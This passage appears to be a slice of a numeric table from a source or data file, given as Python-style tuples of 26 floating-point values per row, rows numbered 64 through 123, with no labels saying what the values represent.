(4.149368089828959, 3.6192688385916783, 3.346509144947417, 3.613098533950618, 2.999794206689266, 1.4583333333333335, 1.4916302670862585, 1.2510812757201648, 1.5721574897119341, 0.707679579332419, 0.5437575300328387, 0.31009010821521116, 0.0, 4.05, 3.4109911903673225, 2.7187876501641934, 2.1230387379972564, 3.1443149794238683, 1.7515137860082308, 1.4916302670862585, 1.0416666666666667, 1.499897103344633, 1.2043661779835395, 0.6693018289894834, 0.3290244398719708, 0.0), # 64
(4.149677265256975, 3.6063414494741655, 3.3427069044352997, 3.609365354938272, 2.999894952426658, 1.4583333333333335, 1.4867626886145406, 1.2443415637860082, 1.5705812757201647, 0.7054052354823961, 0.5431667498025524, 0.3095831428135955, 0.0, 4.05, 3.40541457094955, 2.715833749012762, 2.116215706447188, 3.1411625514403294, 1.7420781893004116, 1.4867626886145406, 1.0416666666666667, 1.499947476213329, 1.2031217849794242, 0.66854138088706, 0.32784922267946964, 0.0), # 65
(4.149883696118478, 3.593625308641976, 3.3389320987654325, 3.605622916666667, 2.9999621645185526, 1.4583333333333335, 1.4819832244008715, 1.2379722222222225, 1.56901, 0.7031923456790125, 0.542570482603816, 0.3090798353909466, 0.0, 4.05, 3.399878189300412, 2.7128524130190796, 2.1095770370370373, 3.13802, 1.7331611111111116, 1.4819832244008715, 1.0416666666666667, 1.4999810822592763, 1.2018743055555559, 0.6677864197530866, 0.3266932098765433, 0.0), # 66
(4.149987064082717, 3.581144558756287, 3.3351902149062647, 3.601874922839506, 2.999995794018168, 1.4583333333333335, 1.4773013636730412, 1.2319979423868317, 1.5674456378600823, 0.7010462871513491, 0.5419691274888808, 0.3085809175430575, 0.0, 4.05, 3.394390092973632, 2.7098456374444035, 2.103138861454047, 3.1348912757201646, 1.7247971193415643, 1.4773013636730412, 1.0416666666666667, 1.499997897009084, 1.2006249742798356, 0.6670380429812529, 0.3255585962505716, 0.0), # 67
(4.14991664579233, 3.5688578344174515, 3.331468649977138, 3.5980925221417075, 2.9999674547459585, 1.4583062693695066, 1.4727030389659292, 1.226390641670477, 1.5658783798201494, 0.6989620441647167, 0.5413523992360252, 0.3080843340633248, 0.0, 4.0499500600137175, 3.388927674696572, 2.7067619961801257, 2.09688613249415, 3.131756759640299, 1.716946898338668, 1.4727030389659292, 1.0416473352639333, 1.4999837273729792, 1.199364174047236, 0.6662937299954276, 0.3244416213106775, 0.0), # 68
(4.149256682769726, 3.5563900238948625, 3.3276628086419753, 3.594085054347826, 2.999709513435003, 1.4580923182441705, 1.4680536362693228, 1.2208497942386831, 1.5642397119341562, 0.6968806390704431, 0.5406575225943647, 0.3075739657786442, 0.0, 4.049554398148149, 3.3833136235650856, 2.7032876129718235, 2.090641917211329, 3.1284794238683125, 1.7091897119341564, 1.4680536362693228, 1.0414945130315503, 1.4998547567175016, 1.1980283514492756, 0.665532561728395, 0.3233081839904421, 0.0), # 69
(4.147954315023558, 3.5436839019425634, 3.3237561442615453, 3.589826137278583, 2.999199817101051, 1.4576709597114261, 1.463332026912274, 1.2153254077122393, 1.5625203856119496, 0.6947919524462736, 0.539876592435072, 0.307047425376427, 0.0, 4.048772933813444, 3.3775216791406963, 2.6993829621753602, 2.0843758573388205, 3.1250407712238992, 1.701455570797135, 1.463332026912274, 1.0411935426510186, 1.4995999085505256, 1.1966087124261946, 0.6647512288523091, 0.32215308199477855, 0.0), # 70
(4.146027864257172, 3.5307470618168946, 3.319750028577961, 3.585322051127214, 2.9984448210011028, 1.4570490219986791, 1.4585403319077976, 1.2098193110806281, 1.5607229614388052, 0.6926960359342641, 0.5390124913855908, 0.3065050979070905, 0.0, 4.047615955075446, 3.3715560769779955, 2.695062456927954, 2.0780881078027917, 3.1214459228776104, 1.6937470355128794, 1.4585403319077976, 1.040749301427628, 1.4992224105005514, 1.1951073503757383, 0.6639500057155922, 0.3209770056197177, 0.0), # 71
(4.143495652173914, 3.5175870967741933, 3.3156458333333334, 3.5805790760869565, 2.9974509803921565, 1.4562333333333337, 1.4536806722689075, 1.2043333333333335, 1.55885, 0.6905929411764707, 0.5380681020733654, 0.3059473684210527, 0.0, 4.04609375, 3.365421052631579, 2.6903405103668265, 2.071778823529412, 3.1177, 1.6860666666666668, 1.4536806722689075, 1.040166666666667, 1.4987254901960783, 1.1935263586956524, 0.6631291666666667, 0.31978064516129034, 0.0), # 72
(4.140376000477128, 3.5042116000707995, 3.3114449302697757, 3.575603492351047, 2.996224750531214, 1.4552307219427933, 1.4487551690086184, 1.1988693034598386, 1.556904061880811, 0.6884827198149495, 0.5370463071258393, 0.30537462196873066, 0.0, 4.04421660665295, 3.3591208416560367, 2.6852315356291965, 2.065448159444848, 3.113808123761622, 1.678417024843774, 1.4487551690086184, 1.0394505156734237, 1.498112375265607, 1.1918678307836825, 0.6622889860539553, 0.31856469091552725, 0.0), # 73
(4.136687230870161, 3.4906281649630513, 3.307148691129401, 3.570401580112721, 2.9947725866752735, 1.4540480160544635, 1.4437659431399446, 1.1934290504496268, 1.5548877076665142, 0.6863654234917563, 0.5359499891704572, 0.30478724360054227, 0.0, 4.041994813100138, 3.3526596796059644, 2.6797499458522855, 2.0590962704752687, 3.1097754153330284, 1.6708006706294773, 1.4437659431399446, 1.0386057257531882, 1.4973862933376367, 1.190133860037574, 0.6614297382258802, 0.31732983317845925, 0.0), # 74
(4.13244766505636, 3.4768443847072876, 3.302758487654321, 3.564979619565217, 2.9931009440813363, 1.452692043895748, 1.4387151156759002, 1.188014403292181, 1.5528034979423868, 0.6842411038489471, 0.5347820308346625, 0.30418561836690494, 0.0, 4.039438657407408, 3.3460418020359537, 2.673910154173312, 2.052723311546841, 3.1056069958847736, 1.6632201646090536, 1.4387151156759002, 1.0376371742112487, 1.4965504720406682, 1.1883265398550726, 0.6605516975308642, 0.3160767622461171, 0.0), # 75
(4.127675624739071, 3.462867852559848, 3.2982756915866487, 3.559343890901771, 2.9912162780064016, 1.4511696336940512, 1.4336048076294992, 1.1826271909769854, 1.5506539932937051, 0.682109812528578, 0.5335453147458995, 0.3035701313182361, 0.0, 4.036558427640603, 3.339271444500597, 2.6677265737294973, 2.046329437585734, 3.1013079865874102, 1.6556780673677796, 1.4336048076294992, 1.0365497383528937, 1.4956081390032008, 1.186447963633924, 0.6596551383173298, 0.31480616841453174, 0.0), # 76
(4.122389431621637, 3.4487061617770705, 3.2937016746684953, 3.55350067431562, 2.9891250437074692, 1.4494876136767771, 1.4284371400137559, 1.1772692424935225, 1.5484417543057463, 0.6799716011727052, 0.5322427235316126, 0.3029411675049536, 0.0, 4.03336441186557, 3.332352842554489, 2.6612136176580625, 2.039914803518115, 3.0968835086114925, 1.6481769394909316, 1.4284371400137559, 1.0353482954834123, 1.4945625218537346, 1.1845002247718734, 0.6587403349336991, 0.31351874197973373, 0.0), # 77
(4.1166074074074075, 3.4343669056152932, 3.2890378086419756, 3.54745625, 2.98683369644154, 1.4476528120713306, 1.423214233841685, 1.171942386831276, 1.5461693415637856, 0.6778265214233843, 0.5308771398192452, 0.30229911197747467, 0.0, 4.029866898148149, 3.3252902317522204, 2.654385699096226, 2.0334795642701526, 3.092338683127571, 1.6407193415637862, 1.423214233841685, 1.0340377229080933, 1.49341684822077, 1.182485416666667, 0.6578075617283952, 0.312215173237754, 0.0), # 78
(4.110347873799726, 3.4198576773308558, 3.2842854652492, 3.541216898148148, 2.9843486914656125, 1.445672057105116, 1.4179382101263003, 1.166648452979729, 1.5438393156531016, 0.6756746249226715, 0.5294514462362415, 0.30164434978621685, 0.0, 4.026076174554183, 3.318087847648385, 2.6472572311812077, 2.0270238747680143, 3.0876786313062032, 1.6333078341716205, 1.4179382101263003, 1.0326228979322258, 1.4921743457328063, 1.1804056327160497, 0.6568570930498401, 0.31089615248462327, 0.0), # 79
(4.103629152501939, 3.4051860701800964, 3.2794460162322814, 3.534788898953301, 2.9816764840366874, 1.4435521770055377, 1.4126111898806162, 1.1613892699283648, 1.5414542371589697, 0.6735159633126228, 0.527968525410046, 0.30097726598159785, 0.0, 4.02200252914952, 3.310749925797576, 2.6398426270502298, 2.020547889937868, 3.0829084743179394, 1.6259449778997108, 1.4126111898806162, 1.0311086978610984, 1.4908382420183437, 1.1782629663177673, 0.6558892032464564, 0.3095623700163725, 0.0), # 80
(4.096469565217392, 3.390359677419355, 3.2745208333333338, 3.5281785326086963, 2.9788235294117644, 1.4413000000000002, 1.4072352941176471, 1.1561666666666668, 1.5390166666666665, 0.6713505882352943, 0.5264312599681021, 0.3002982456140351, 0.0, 4.01765625, 3.303280701754386, 2.632156299840511, 2.0140517647058824, 3.078033333333333, 1.6186333333333336, 1.4072352941176471, 1.0295, 1.4894117647058822, 1.1760595108695657, 0.6549041666666667, 0.30821451612903233, 0.0), # 81
(4.088887433649431, 3.3753860923049697, 3.269511288294468, 3.5213920793075686, 2.975796282847844, 1.4389223543159075, 1.4018126438504073, 1.1509824721841184, 1.5365291647614692, 0.6691785513327417, 0.5248425325378543, 0.29960767373394626, 0.0, 4.013047625171469, 3.2956844110734083, 2.624212662689271, 2.0075356539982248, 3.0730583295229383, 1.6113754610577657, 1.4018126438504073, 1.0278016816542197, 1.487898141423922, 1.1737973597691898, 0.6539022576588936, 0.30685328111863364, 0.0), # 82
(4.080901079501402, 3.3602729080932785, 3.264418752857796, 3.514435819243156, 2.9726011996019257, 1.4364260681806638, 1.3963453600919107, 1.1458385154702029, 1.533994292028654, 0.6669999042470213, 0.5232052257467463, 0.29890593539174876, 0.0, 4.008186942729767, 3.287965289309236, 2.6160261287337314, 2.0009997127410637, 3.067988584057308, 1.604173921658284, 1.3963453600919107, 1.0260186201290455, 1.4863005998009629, 1.1714786064143856, 0.6528837505715593, 0.3054793552812072, 0.0), # 83
(4.072528824476651, 3.345027718040621, 3.259244598765432, 3.507316032608696, 2.969244734931009, 1.4338179698216735, 1.3908355638551717, 1.1407366255144034, 1.5314146090534977, 0.664814698620189, 0.5215222222222223, 0.2981934156378601, 0.0, 4.003084490740741, 3.280127572016461, 2.6076111111111113, 1.9944440958605667, 3.0628292181069954, 1.5970312757201646, 1.3908355638551717, 1.0241556927297668, 1.4846223674655046, 1.169105344202899, 0.6518489197530865, 0.3040934289127838, 0.0), # 84
(4.063788990278524, 3.3296581154033364, 3.253990197759488, 3.5000389995974235, 2.9657333440920954, 1.431104887466342, 1.385285376153205, 1.1356786313062037, 1.528792676421277, 0.6626229860943007, 0.5197964045917264, 0.29747049952269794, 0.0, 3.9977505572702334, 3.272175494749677, 2.5989820229586313, 1.9878689582829017, 3.057585352842554, 1.589950083828685, 1.385285376153205, 1.0222177767616727, 1.4828666720460477, 1.1666796665324748, 0.6507980395518976, 0.30269619230939426, 0.0), # 85
(4.054699898610365, 3.3141716934377627, 3.2486569215820764, 3.492611000402577, 2.9620734823421824, 1.4282936493420721, 1.3796969179990242, 1.1306663618350863, 1.5261310547172688, 0.6604248183114125, 0.5180306554827024, 0.29673757209667984, 0.0, 3.992195430384088, 3.2641132930634775, 2.5901532774135116, 1.9812744549342374, 3.0522621094345377, 1.5829329065691207, 1.3796969179990242, 1.0202097495300515, 1.4810367411710912, 1.1642036668008593, 0.6497313843164153, 0.3012883357670694, 0.0), # 86
(4.045279871175523, 3.298576045400239, 3.2432461419753085, 3.485038315217391, 2.9582716049382722, 1.4253910836762689, 1.3740723104056438, 1.1257016460905351, 1.5234323045267493, 0.6582202469135804, 0.5162278575225944, 0.29599501841022313, 0.0, 3.9864293981481485, 3.255945202512454, 2.581139287612972, 1.9746607407407408, 3.0468646090534985, 1.5759823045267491, 1.3740723104056438, 1.018136488340192, 1.4791358024691361, 1.1616794384057973, 0.6486492283950618, 0.29987054958183995, 0.0), # 87
(4.035547229677343, 3.2828787645471036, 3.2377592306812986, 3.477327224235105, 2.954334167137363, 1.4224040186963371, 1.3684136743860782, 1.1207863130620332, 1.5206989864349947, 0.6560093235428602, 0.5143908933388467, 0.29524322351374555, 0.0, 3.9804627486282587, 3.2476754586512007, 2.571954466694233, 1.9680279706285804, 3.0413979728699894, 1.5691008382868465, 1.3684136743860782, 1.0160028704973836, 1.4771670835686814, 1.1591090747450352, 0.6475518461362598, 0.29844352404973673, 0.0), # 88
(4.025520295819169, 3.267087444134696, 3.2321975594421586, 3.4694840076489535, 2.950267624196455, 1.4193392826296807, 1.3627231309533416, 1.1159221917390643, 1.5179336610272824, 0.6537920998413084, 0.512522645558903, 0.29448257245766457, 0.0, 3.9743057698902606, 3.2393082970343094, 2.5626132277945146, 1.9613762995239248, 3.035867322054565, 1.56229106843469, 1.3627231309533416, 1.0138137733069148, 1.4751338120982276, 1.156494669216318, 0.6464395118884317, 0.2970079494667906, 0.0), # 89
(4.015217391304348, 3.2512096774193546, 3.2265625000000004, 3.4615149456521745, 2.946078431372549, 1.4162037037037039, 1.3570028011204482, 1.1111111111111112, 1.515138888888889, 0.6515686274509805, 0.5106259968102075, 0.2937134502923977, 0.0, 3.9679687500000003, 3.230847953216374, 2.553129984051037, 1.9547058823529413, 3.030277777777778, 1.5555555555555556, 1.3570028011204482, 1.0115740740740742, 1.4730392156862746, 1.1538383152173917, 0.6453125000000001, 0.2955645161290323, 0.0), # 90
(4.004656837836225, 3.235253057657418, 3.2208554240969365, 3.4534263184380034, 2.9417730439226437, 1.413004110145811, 1.3512548059004124, 1.1063549001676574, 1.512317230605091, 0.6493389580139327, 0.5087038297202041, 0.2929362420683625, 0.0, 3.961461977023319, 3.222298662751987, 2.5435191486010202, 1.9480168740417978, 3.024634461210182, 1.5488968602347204, 1.3512548059004124, 1.0092886501041507, 1.4708865219613219, 1.1511421061460014, 0.6441710848193873, 0.2941139143324926, 0.0), # 91
(3.9938569571181493, 3.2192251781052263, 3.21507770347508, 3.445224406199678, 2.937357917103741, 1.4097473301834071, 1.3454812663062485, 1.1016553878981865, 1.5094712467611644, 0.6471031431722211, 0.506759026916337, 0.29215133283597666, 0.0, 3.954795739026063, 3.2136646611957427, 2.5337951345816845, 1.9413094295166629, 3.018942493522329, 1.5423175430574612, 1.3454812663062485, 1.0069623787024338, 1.4686789585518705, 1.148408135399893, 0.6430155406950161, 0.29265683437320245, 0.0), # 92
(3.982836070853462, 3.2031336320191164, 3.2092307098765436, 3.4369154891304357, 2.932839506172839, 1.4064401920438958, 1.3396843033509702, 1.0970144032921811, 1.506603497942387, 0.6448612345679013, 0.50479447102605, 0.29135910764565737, 0.0, 3.9479803240740736, 3.2049501841022305, 2.52397235513025, 1.9345837037037037, 3.013206995884774, 1.5358201646090537, 1.3396843033509702, 1.0046001371742113, 1.4664197530864196, 1.145638496376812, 0.6418461419753088, 0.29119396654719243, 0.0), # 93
(3.971612500745512, 3.1869860126554275, 3.203315815043439, 3.428505847423511, 2.9282242663869384, 1.403089523954682, 1.3338660380475922, 1.0924337753391253, 1.5037165447340346, 0.6426132838430298, 0.5028130446767874, 0.2905599515478225, 0.0, 3.9410260202331964, 3.196159467026047, 2.5140652233839367, 1.927839851529089, 3.007433089468069, 1.5294072854747756, 1.3338660380475922, 1.0022068028247728, 1.4641121331934692, 1.1428352824745038, 0.6406631630086879, 0.28972600115049346, 0.0), # 94
(3.960204568497644, 3.170789913270499, 3.1973343907178786, 3.420001761272142, 2.9235186530030397, 1.3997021541431696, 1.3280285914091288, 1.0879153330285019, 1.500812947721384, 0.6403593426396622, 0.5008176304959931, 0.28975424959288937, 0.0, 3.933943115569273, 3.187296745521783, 2.504088152479966, 1.9210780279189863, 3.001625895442768, 1.5230814662399026, 1.3280285914091288, 0.9997872529594067, 1.4617593265015199, 1.1400005870907142, 0.6394668781435758, 0.2882536284791363, 0.0), # 95
(3.948630595813205, 3.15455292712067, 3.1912878086419756, 3.4114095108695652, 2.9187291212781408, 1.3962849108367628, 1.3221740844485943, 1.0834609053497943, 1.497895267489712, 0.638099462599855, 0.4988111111111112, 0.2889423868312758, 0.0, 3.9267418981481486, 3.1783662551440335, 2.494055555555556, 1.9142983877995645, 2.995790534979424, 1.5168452674897122, 1.3221740844485943, 0.9973463648834019, 1.4593645606390704, 1.1371365036231886, 0.6382575617283952, 0.28677753882915186, 0.0), # 96
(3.936908904395539, 3.138282647462278, 3.185177440557842, 3.4027353764090176, 2.913862126469244, 1.3928446222628663, 1.3163046381790027, 1.0790723212924862, 1.4949660646242953, 0.6358336953656636, 0.4967963691495856, 0.288124748313399, 0.0, 3.919432656035666, 3.169372231447389, 2.4839818457479277, 1.9075010860969903, 2.9899321292485905, 1.5107012498094807, 1.3163046381790027, 0.9948890159020474, 1.456931063234622, 1.1342451254696728, 0.6370354881115684, 0.2852984224965707, 0.0), # 97
(3.925057815947994, 3.1219866675516617, 3.17900465820759, 3.3939856380837363, 2.908924123833347, 1.3893881166488853, 1.3104223736133687, 1.0747514098460602, 1.4920278997104097, 0.6335620925791443, 0.49477628723886047, 0.28730171908967667, 0.0, 3.9120256772976685, 3.1603189099864424, 2.4738814361943025, 1.9006862777374325, 2.9840557994208194, 1.5046519737844843, 1.3104223736133687, 0.9924200833206323, 1.4544620619166735, 1.1313285460279123, 0.6358009316415181, 0.2838169697774238, 0.0), # 98
(3.9130956521739133, 3.1056725806451615, 3.1727708333333338, 3.3851665760869567, 2.9039215686274513, 1.3859222222222223, 1.3045294117647062, 1.0705000000000002, 1.4890833333333333, 0.6312847058823531, 0.4927537480063797, 0.2864736842105264, 0.0, 3.9045312500000002, 3.1512105263157895, 2.4637687400318984, 1.893854117647059, 2.9781666666666666, 1.4987000000000004, 1.3045294117647062, 0.9899444444444444, 1.4519607843137257, 1.1283888586956525, 0.6345541666666669, 0.282333870967742, 0.0), # 99
(3.901040734776645, 3.0893479799991144, 3.1664773376771835, 3.3762844706119166, 2.8988609161085557, 1.382453767210283, 1.298627873646029, 1.0663199207437892, 1.4861349260783419, 0.629001586917346, 0.49073163407958736, 0.2856410287263656, 0.0, 3.896959662208505, 3.142051315990021, 2.4536581703979365, 1.8870047607520375, 2.9722698521566837, 1.492847889041305, 1.298627873646029, 0.9874669765787736, 1.4494304580542778, 1.125428156870639, 0.6332954675354368, 0.28084981636355594, 0.0), # 100
(3.888911385459534, 3.0730204588698617, 3.160125542981253, 3.367345601851852, 2.8937486215336614, 1.3789895798404714, 1.2927198802703526, 1.0622130010669104, 1.4831852385307118, 0.626712787326179, 0.48871282808592753, 0.2848041376876118, 0.0, 3.8893212019890258, 3.1328455145637295, 2.4435641404296375, 1.8801383619785366, 2.9663704770614236, 1.4870982014936747, 1.2927198802703526, 0.9849925570289081, 1.4468743107668307, 1.1224485339506176, 0.6320251085962507, 0.2793654962608966, 0.0), # 101
(3.8767259259259266, 3.05669761051374, 3.1537168209876545, 3.3583562500000004, 2.8885911401597673, 1.3755364883401924, 1.2868075526506901, 1.0581810699588479, 1.4802368312757201, 0.624418358750908, 0.48670021265284436, 0.28396339614468274, 0.0, 3.881626157407408, 3.12359735759151, 2.4335010632642216, 1.8732550762527236, 2.9604736625514403, 1.481453497942387, 1.2868075526506901, 0.9825260631001375, 1.4442955700798836, 1.1194520833333337, 0.630743364197531, 0.27788160095579456, 0.0), # 102
(3.864502677879168, 3.040387028187088, 3.1472525434385004, 3.349322695249598, 2.883394927243874, 1.3721013209368493, 1.280893011800056, 1.0542259564090841, 1.4772922648986433, 0.6221183528335891, 0.48469667040778164, 0.2831191891479958, 0.0, 3.873884816529492, 3.114311080627953, 2.4234833520389083, 1.8663550585007669, 2.9545845297972866, 1.475916338972718, 1.280893011800056, 0.9800723720977494, 1.441697463621937, 1.1164408984165328, 0.6294505086877001, 0.2763988207442808, 0.0), # 103
(3.852259963022604, 3.0240963051462453, 3.140734082075903, 3.340251217793881, 2.878166438042981, 1.3686909058578471, 1.2749783787314652, 1.0503494894071028, 1.4743540999847584, 0.6198128212162782, 0.48270508397818346, 0.2822719017479685, 0.0, 3.8661074674211253, 3.104990919227653, 2.413525419890917, 1.8594384636488344, 2.948708199969517, 1.4704892851699438, 1.2749783787314652, 0.9776363613270336, 1.4390832190214904, 1.1134170725979606, 0.6281468164151807, 0.274917845922386, 0.0), # 104
(3.840016103059581, 3.0078330346475504, 3.1341628086419755, 3.3311480978260866, 2.8729121278140886, 1.3653120713305902, 1.2690657744579317, 1.0465534979423872, 1.4714248971193415, 0.6175018155410315, 0.480728335991494, 0.2814219189950185, 0.0, 3.858304398148148, 3.0956411089452027, 2.40364167995747, 1.852505446623094, 2.942849794238683, 1.465174897119342, 1.2690657744579317, 0.9752229080932786, 1.4364560639070443, 1.1103826992753625, 0.6268325617283951, 0.273439366786141, 0.0), # 105
(3.8277894196934454, 2.9916048099473427, 3.1275400948788294, 3.3220196155394524, 2.867638451814196, 1.3619716455824824, 1.263157319992469, 1.0428398110044201, 1.4685072168876694, 0.6151853874499046, 0.4787693090751571, 0.2805696259395632, 0.0, 3.850485896776406, 3.0862658853351945, 2.3938465453757853, 1.8455561623497134, 2.9370144337753388, 1.4599757354061882, 1.263157319992469, 0.9728368897017731, 1.433819225907098, 1.1073398718464844, 0.6255080189757659, 0.27196407363157665, 0.0), # 106
(3.8155982346275423, 2.9754192243019606, 3.1208673125285786, 3.312872051127214, 2.8623518653003037, 1.3586764568409289, 1.2572551363480924, 1.0392102575826858, 1.465603619875019, 0.612863588584954, 0.47683088585661687, 0.2797154076320202, 0.0, 3.842662251371742, 3.0768694839522217, 2.3841544292830843, 1.8385907657548617, 2.931207239750038, 1.4548943606157603, 1.2572551363480924, 0.9704831834578064, 1.4311759326501519, 1.1042906837090716, 0.6241734625057157, 0.2704926567547237, 0.0), # 107
(3.8034608695652175, 2.9592838709677425, 3.114145833333334, 3.303711684782609, 2.857058823529411, 1.3554333333333337, 1.2513613445378151, 1.0356666666666667, 1.4627166666666667, 0.6105364705882355, 0.47491594896331746, 0.2788596491228071, 0.0, 3.8348437500000006, 3.0674561403508775, 2.374579744816587, 1.8316094117647062, 2.9254333333333333, 1.4499333333333335, 1.2513613445378151, 0.9681666666666668, 1.4285294117647056, 1.10123722826087, 0.6228291666666669, 0.269025806451613, 0.0), # 108
(3.7913956462098173, 2.9432063432010267, 3.1073770290352085, 3.2945447966988723, 2.85176578175852, 1.3522491032871007, 1.2454780655746525, 1.032210867245847, 1.4598489178478888, 0.6082040851018049, 0.4730273810227027, 0.2780027354623413, 0.0, 3.8270406807270234, 3.0580300900857535, 2.3651369051135136, 1.8246122553054143, 2.9196978356957777, 1.4450952141441857, 1.2454780655746525, 0.9658922166336433, 1.42588289087926, 1.0981815988996244, 0.6214754058070417, 0.2675642130182752, 0.0), # 109
(3.7794208862646865, 2.9271942342581534, 3.1005622713763157, 3.285377667069243, 2.846479195244628, 1.3491305949296348, 1.2396074204716179, 1.0288446883097089, 1.4570029340039627, 0.6058664837677185, 0.4711680646622168, 0.2771450517010405, 0.0, 3.819263331618656, 3.0485955687114448, 2.355840323311084, 1.817599451303155, 2.9140058680079255, 1.4403825636335925, 1.2396074204716179, 0.9636647106640249, 1.423239597622314, 1.0951258890230813, 0.6201124542752632, 0.2661085667507413, 0.0), # 110
(3.7675549114331726, 2.91125513739546, 3.093702932098766, 3.2762165760869566, 2.841205519244735, 1.3460846364883403, 1.2337515302417263, 1.0255699588477367, 1.4541812757201646, 0.6035237182280321, 0.4693408825093036, 0.27628698288932213, 0.0, 3.811521990740741, 3.039156811782543, 2.346704412546518, 1.810571154684096, 2.9083625514403293, 1.4357979423868314, 1.2337515302417263, 0.9614890260631003, 1.4206027596223676, 1.0920721920289858, 0.6187405864197533, 0.26465955794504187, 0.0), # 111
(3.75581604341862, 2.895396645869286, 3.086800382944674, 3.26706780394525, 2.8359512090158425, 1.3431180561906215, 1.2279125158979918, 1.0223885078494133, 1.4513865035817708, 0.6011758401248017, 0.46754871719140734, 0.2754289140776037, 0.0, 3.803826946159122, 3.0297180548536407, 2.337743585957037, 1.8035275203744048, 2.9027730071635416, 1.4313439109891786, 1.2279125158979918, 0.9593700401361582, 1.4179756045079213, 1.0890226013150834, 0.6173600765889348, 0.2632178768972078, 0.0), # 112
(3.744201689481218, 2.8796528268881825, 3.0798726094173565, 3.257950164747612, 2.830713514712988, 1.3402362794833866, 1.222105192731354, 1.0193087614634344, 1.4486283748344828, 0.5988304736612731, 0.4657949270768578, 0.274573097883481, 0.0, 3.7961775603372887, 3.0203040767182903, 2.328974635384289, 1.796491420983819, 2.8972567496689656, 1.4270322660488082, 1.222105192731354, 0.957311628202419, 1.415356757356494, 1.0859833882492043, 0.6159745218834713, 0.26178662062619845, 0.0), # 113
(3.732592359160026, 2.8641789672926965, 3.0730152250072065, 3.2489368263832006, 2.8254382278843537, 1.3374327419903105, 1.216403641682116, 1.0163685432508534, 1.4459492047617415, 0.5965315167912784, 0.46408295580754655, 0.2737304057370992, 0.0, 3.788510165664014, 3.0110344631080905, 2.3204147790377325, 1.7895945503738346, 2.891898409523483, 1.4229159605511947, 1.216403641682116, 0.9553091014216503, 1.4127191139421769, 1.0829789421277338, 0.6146030450014414, 0.2603799061175179, 0.0), # 114
(3.720953961201598, 2.848980639517117, 3.066232310902439, 3.240025351554534, 2.820108714103627, 1.3347001529163784, 1.2108119300383124, 1.0135671090464515, 1.4433499971558386, 0.5942825327988078, 0.46241030076180634, 0.27290125275196175, 0.0, 3.7808026526641507, 3.001913780271579, 2.3120515038090312, 1.7828475983964231, 2.886699994311677, 1.4189939526650321, 1.2108119300383124, 0.9533572520831274, 1.4100543570518136, 1.0800084505181782, 0.613246462180488, 0.2589982399561016, 0.0), # 115
(3.709271949295054, 2.8340357031402905, 3.0595107299946247, 3.231199845079921, 2.8147169403690073, 1.3320320713669895, 1.2053209635055788, 1.010896718816499, 1.4408241785637108, 0.5920793358449549, 0.4607737287514322, 0.27208410658291154, 0.0, 3.7730429039023563, 2.9929251724120265, 2.3038686437571605, 1.7762380075348643, 2.8816483571274216, 1.4152554063430987, 1.2053209635055788, 0.9514514795478496, 1.4073584701845037, 1.0770666150266406, 0.611902145998925, 0.25763960937639013, 0.0), # 116
(3.697531777129509, 2.8193220177410643, 3.052837345175329, 3.2224444117776727, 2.8092548736786958, 1.3294220564475412, 1.1999216477895505, 1.0083496325272643, 1.4383651755322937, 0.589917740090813, 0.45917000658821894, 0.2712774348847917, 0.0, 3.76521880194329, 2.9840517837327085, 2.2958500329410945, 1.7697532202724386, 2.8767303510645874, 1.4116894855381699, 1.1999216477895505, 0.9495871831768151, 1.4046274368393479, 1.0741481372592245, 0.6105674690350659, 0.25630200161282407, 0.0), # 117
(3.6857188983940845, 2.804817442898285, 3.0461990193361226, 3.2137431564660996, 2.8037144810308914, 1.3268636672634326, 1.1946048885958631, 1.0059181101450163, 1.4359664146085245, 0.587793559697476, 0.4575959010839617, 0.27047970531244503, 0.0, 3.75731822935161, 2.9752767584368947, 2.287979505419808, 1.7633806790924278, 2.871932829217049, 1.4082853542030227, 1.1946048885958631, 0.9477597623310232, 1.4018572405154457, 1.0712477188220335, 0.6092398038672245, 0.25498340389984414, 0.0), # 118
(3.673818766777897, 2.790499838190801, 3.0395826153685745, 3.2050801839635117, 2.7980877294237922, 1.324350462920061, 1.1893615916301512, 1.0035944116360243, 1.433621322339339, 0.5857026088260373, 0.45604817905045525, 0.26968938552071453, 0.0, 3.749329068691973, 2.9665832407278594, 2.2802408952522764, 1.7571078264781117, 2.867242644678678, 1.405032176290434, 1.1893615916301512, 0.9459646163714721, 1.3990438647118961, 1.0683600613211708, 0.607916523073715, 0.253681803471891, 0.0), # 119
(3.6618168359700647, 2.776347063197458, 3.0329749961642545, 3.196439599088218, 2.792366585855599, 1.3218760025228253, 1.1841826625980507, 1.0013707969665573, 1.4313233252716744, 0.5836407016375906, 0.4545236072994945, 0.2689049431644433, 0.0, 3.741239202529039, 2.9579543748088755, 2.272618036497472, 1.7509221049127714, 2.8626466505433488, 1.40191911575318, 1.1841826625980507, 0.9441971446591609, 1.3961832929277995, 1.0654798663627396, 0.6065949992328509, 0.25239518756340534, 0.0), # 120
(3.6496985596597074, 2.762336977497104, 3.0263630246147293, 3.1878055066585302, 2.7865430173245116, 1.319433845177124, 1.179059007205196, 0.9992395261028846, 1.4290658499524664, 0.5816036522932297, 0.4530189526428745, 0.26812484589847413, 0.0, 3.7330365134274643, 2.9493733048832147, 2.265094763214372, 1.744810956879689, 2.858131699904933, 1.3989353365440385, 1.179059007205196, 0.9424527465550885, 1.3932715086622558, 1.0626018355528437, 0.6052726049229459, 0.2511215434088277, 0.0), # 121
(3.6374493915359416, 2.7484474406685857, 3.0197335636115703, 3.179162011492757, 2.780608990828729, 1.3170175499883545, 1.1739815311572235, 0.9971928590112749, 1.4268423229286518, 0.5795872749540478, 0.45153098189239016, 0.2673475613776501, 0.0, 3.7247088839519082, 2.9408231751541503, 2.2576549094619507, 1.7387618248621433, 2.8536846458573035, 1.3960700026157848, 1.1739815311572235, 0.9407268214202532, 1.3903044954143644, 1.059720670497586, 0.6039467127223141, 0.24985885824259874, 0.0), # 122
(3.6250547852878876, 2.7346563122907503, 3.013073476046346, 3.1704932184092085, 2.774556473366451, 1.314620676061916, 1.1689411401597678, 0.9952230556579972, 1.4246461707471672, 0.5775873837811388, 0.4500564618598364, 0.2665715572568141, 0.0, 3.716244196667029, 2.9322871298249544, 2.2502823092991817, 1.7327621513434162, 2.8492923414943343, 1.3933122779211962, 1.1689411401597678, 0.9390147686156541, 1.3872782366832255, 1.0568310728030696, 0.6026146952092691, 0.24860511929915918, 0.0), # 123
